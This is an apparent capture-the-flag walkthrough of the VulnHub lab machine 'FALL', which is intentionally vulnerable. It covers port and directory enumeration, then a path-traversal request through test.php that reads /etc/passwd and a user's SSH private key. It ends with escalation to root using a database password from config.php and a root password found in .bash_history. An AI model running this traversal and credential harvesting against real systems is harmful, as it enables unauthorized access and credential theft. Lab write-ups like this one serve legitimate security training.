FALL
FALL (aka digitalworld.local: FALL) is a virtual machine you can try yourself by downloading it from VulnHub
NMAP
I start pretty much every time with finding out what ports are open:
$ nmap -sV -sC --open -p- -Pn $IP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-18 01:42 EDT
Stats: 0:05:42 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 12.40% done; ETC: 02:27 (0:40:16 remaining)
Stats: 0:10:08 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 27.09% done; ETC: 02:19 (0:27:17 remaining)
Stats: 0:22:49 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 87.05% done; ETC: 02:08 (0:03:24 remaining)
Nmap scan report for 10.0.1.147
Host is up (0.58s latency).
Not shown: 63995 filtered tcp ports (no-response), 1527 filtered tcp ports (host-unreach), 6 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.8 (protocol 2.0)
| ssh-hostkey:
| 2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA)
| 256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA)
|_ 256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519)
80/tcp open http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
|_http-title: Good Tech Inc's Fall Sales - Home
| http-robots.txt: 1 disallowed entry
|_/
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
443/tcp open ssl/http Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2019-08-15T03:51:33
|_Not valid after: 2020-08-19T05:31:33
|_ssl-date: TLS randomness does not represent time
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Good Tech Inc's Fall Sales - Home
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.8.10 (workgroup: SAMBA)
3306/tcp open mysql MySQL (unauthorized)
9090/tcp open http Cockpit web service 162 - 188
|_http-title: Did not follow redirect to https://10.0.1.147:9090/
Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h20m01s, deviation: 4h02m31s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.8.10)
| Computer name: fall
| NetBIOS computer name: FALL\x00
| Domain name: \x00
| FQDN: fall
|_ System time: 2022-06-17T23:07:40-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-06-18T06:07:38
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Port 22
SSH is running, this will come in handy later!
Port 80
Web Application
CMS Made Simple version 2.2.15
I did my usual gobuster search for directories, poked around in them, but didn't come up with much.
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.1.147
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/18 01:54:33 Starting gobuster in directory enumeration mode
===============================================================
/modules (Status: 301) [Size: 234] [--> http://10.0.1.147/modules/]
/uploads (Status: 301) [Size: 234] [--> http://10.0.1.147/uploads/]
/doc (Status: 301) [Size: 230] [--> http://10.0.1.147/doc/]
/admin (Status: 301) [Size: 232] [--> http://10.0.1.147/admin/]
/assets (Status: 301) [Size: 233] [--> http://10.0.1.147/assets/]
/lib (Status: 301) [Size: 230] [--> http://10.0.1.147/lib/]
/tmp (Status: 301) [Size: 230] [--> http://10.0.1.147/tmp/]
I tried looking in exploit-db for this specific version and turned up bsically notthing.
Eventually, one of the many fuzzing lists I tried was the CommonBackdoors-PHP.fuzz.txt from seclists. It turned up a very useful file:
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://$IP
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.1.147
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/test.php (Status: 200) [Size: 80]
Progress: 422 / 423 (99.76%)
===============================================================
Finished
===============================================================
Misc
The only other information I turned up does at least give us a potential username:
<script>alert('Page not found! Please contact our infrastructure head at patrick@goodtech.inc if you think this is in error!');
Port 139, 445
Nothing really going on with SMB:
$ smbclient -L $IP -U guest
Password for [WORKGROUP\guest]:
session setup failed: NT_STATUS_LOGON_FAILURE
$ smbmap -H $IP -d WORKGROUP
[+] IP: 10.0.1.147:445 Name: 10.0.1.147
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.8.10)
Port 3306
Doesn't seem to be a direct way into the database remotely:
$ mysql -h $IP
ERROR 1130 (HY000): Host '10.0.1.136' is not allowed to connect to this MySQL server
Port 9090
I spent some time looking for vulnerabilities, default passwords, fuzzing directories, etc. but didn't find anything very interesting.
Initial Access
Our best bet is that test.php script we found. When we browse to that, we receive an alert that there is a missing GET parameter.
<html>
<body>
<script>alert('Missing GET parameter!');</script>
</body>
</html>
I don't remember how I stumbled on the parameter being named file, but with that we can read any files that are accessible to the user the web server is running as.
But what files should we try and read. There's always /etc/passwd which at best may include passwords or hashes directly (though rarely), but at worst we should get some usernames.
Directory Traversal / Local File Inclusion
http://10.0.1.147/test.php?file=../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
systemd-coredump:x:999:996:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cockpit-ws:x:997:993:User for cockpit-ws:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:996:991::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
qiu:x:1000:1000:qiu:/home/qiu:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
nginx:x:995:990:Nginx web server:/var/lib/nginx:/sbin/nologin
tss:x:59:59:Account used by the tpm2-abrmd package to sandbox the tpm2-abrmd daemon:/dev/null:/sbin/nologin
clevis:x:994:989:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
So qiu is a valid user. What are some of the most useful files a user might have? Well it turns out that /home/qiu/.ssh/id_rsa is readable. So let's grab that and then SSH to the box as qiu
ssh -i ./id_rsa qiu@$IP
local.txt
[qiu@FALL ~]$ cat local.txt
A low privilege shell! :-)
Escalating Privileges
Let's look around more more information. We find some configuration files with possibly some more credentials:
PHP Configuration
[qiu@FALL html]$ more config.php
<?php
# CMS Made Simple Configuration File
# Documentation: https://docs.cmsmadesimple.org/configuration/config-file/config-reference
#
$config['dbms'] = 'mysqli';
$config['db_hostname'] = '127.0.0.1';
$config['db_username'] = 'cms_user';
$config['db_password'] = 'P@ssw0rdINSANITY';
$config['db_name'] = 'cms_db';
$config['db_prefix'] = 'cms_';
$config['timezone'] = 'Asia/Singapore';
$config['db_port'] = 3306;
?>
We can use that to read what might be even more credentials from the web applications users database:
CMS Users Table
mysql> select * from cms_users;
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
| user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date |
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
| 1 | qiu | bc8b9059c13582d649d3d9e48c16d67f | 1 | qiu qing | chan | qiu@goodtech.inc | 1 | 2021-05-21 17:06:29 | 2021-05-22 02:28:53 |
| 2 | patrick | 6aea70cc6a678f0f83a82e1c753d7764 | 1 | Patrick | Ong | patrick@goodtech.inc | 1 | 2021-05-22 02:28:33 | 2021-05-22 16:54:13 |
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
2 rows in set (0.00 sec)
Found password?
Ah, the good ol .bash_history file:
[qiu@FALL ~]$ cat .bash_history
ls -al
cat .bash_history
rm .bash_history
echo "remarkablyawesomE" | sudo -S dnf update
Root password is remarkablyawesomE
root.txt
[qiu@FALL ~]$ su
Password:
[root@FALL qiu]# cd /root
[root@FALL ~]# cat proof.txt
Congrats on a root shell! :-)
Thanks
Thanks to Donovan for authoring a fun box!